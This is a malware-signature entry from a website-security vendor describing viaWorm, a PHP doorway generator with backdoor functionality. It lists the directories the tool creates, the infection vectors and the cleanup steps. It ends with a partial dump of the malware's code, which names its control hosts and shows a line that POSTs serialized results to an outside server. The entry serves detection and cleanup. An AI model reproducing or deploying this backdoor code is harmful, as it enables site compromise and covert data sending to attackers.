Malware Signatures

  1. Home
  2. Malware Signatures
  3. php.hacktool.viaWorm-doorway-gen.001

php.hacktool.viaWorm-doorway-gen.001

Hacktools are specially crafted tools to perform malicious or illicit activities, such as controlling botnets, mining bitcoins, triggering Denial-of-Service attacks and bruteforcing passwords. Those tools most of the time hidden in the filesystem and were installed among with other malicious code throug a vulnerability or an already compromised server.
viaWorm is a doorway generator that also has backdoor functionality. Known version of this script work with cssstyle.org and stylesheetcss.com. The doorway generator creates the following directory structure in one of the site's writable directies: __links_sources/__pages_sources; __links_sources/__website_config; __links_sources/__sys_source; __links_sources/__pages_map; __links_sources/__links_sources; __links_sources/__links_sources; __links_sources/__website_source. Inside those directories you can find doorway pages, template, link maps, etc. To make doorways publicly visible, the script makes changes to .htaccess

Affecting

Any vulnerable PHP based website. Outdated software or compromised passwords can act as an infection vector.

Cleanup

Cleanup is done by deleting this doorway gen file, cleaning .htaccess file and deleting the __links_sources/ directory. Depending on the infection penetration level, there might be other malicious files and open security holes.
You can also sign up with us and let our team remove the malware for you.

Dump

/**
 * Class viaWorm
 */
class viaWorm
{
    const DADDY_HOST = 'cssstyle.org';
    const LINKS_DADDY_HOST = 'stylesheetcss.com';
...
        $query = http_build_query(array('worm_result' => serialize($result)));
        $worm_precess_url = 'http://' . viaWorm::DADDY_HOST . '/process-worm';
        viaWorm::sendPost($worm_precess_url, $query);
        echo json_encode($result);
        exit();
}